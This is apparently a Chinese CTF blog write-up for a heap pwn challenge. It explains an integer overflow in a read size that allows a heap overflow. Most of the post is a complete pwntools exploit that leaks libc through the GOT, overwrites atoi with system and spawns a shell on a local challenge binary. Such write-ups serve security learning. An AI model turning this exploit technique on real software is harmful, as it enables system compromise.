0%

3ctf复赛wp

Posted on Edited on In Views: Valine:
Symbols count in article: 2.4k Reading time ≈ 2 mins.

3ctf pwn writeup

唯一一道pwn题

漏洞点

emm,打比赛的时候没看出,整数溢出,然后这里就可以堆溢出了

漏洞利用

buf是一开头就申请的,0x200字节大小,所以read(0, buf, size)的时候size整数溢出的话就可以无限溢出。溢出覆盖好多个chunk,这里攻击第一个fastbin就可以了,改他的结构体指针,然后改atoi就行了

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
import base64

local = 1
host = '127.0.0.1' 
port = 10000
context.log_level = 'debug'
exe = '/tmp/tmp.lZOfZFQz3p/92226e82'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)

uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda name,data       : io.success(name + ": 0x%x" % data)

# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)
def c(idx):
    sla("Input your choice:", str(idx))

def base(content):
    return base64.b64encode(content)
def new(size, content, encode=False):
    c(1)
    sla("please input the size of secret\n", str(size))
    sla("Do you want encode(0) or decode(1) your secret ?", "0" if encode else "1")
    sla("please input your secret:\n", content)

def edit(idx, content):
    c(3)
    sla(":", str(idx))
    sa(":\n", content)

def show(idx):
    c(2)
    sla(":", str(idx))



def exp():
    new(0x200, base("1"*0x58))     
    new(0x200, base("2"*0x58))     
    new(0x200, base("3"*0x58))
    gdb.attach(io)
    payload = flat([
        '\x00'*0x208,
        0x21,
        0x5b,
        elf.got['atoi']
    ])
    new(-1, payload, True)     
    show(0)
    ru("your secret is:\n")
    libc.address = uu64(r(6)) - libc.sym['atoi']
    lg("libc_address", libc.address)
    system = libc.sym['system']
    edit(0, p64(system))
    sla("choice:", str(1))
    ru(" size of secret\n")
    s("sh\x00\x00")
    

if __name__ == '__main__':
    exp()
    io.interactive()

本文作者:NoOne
本文地址https://noonegroup.xyz/posts/28402fba/
版权声明:转载请注明出处!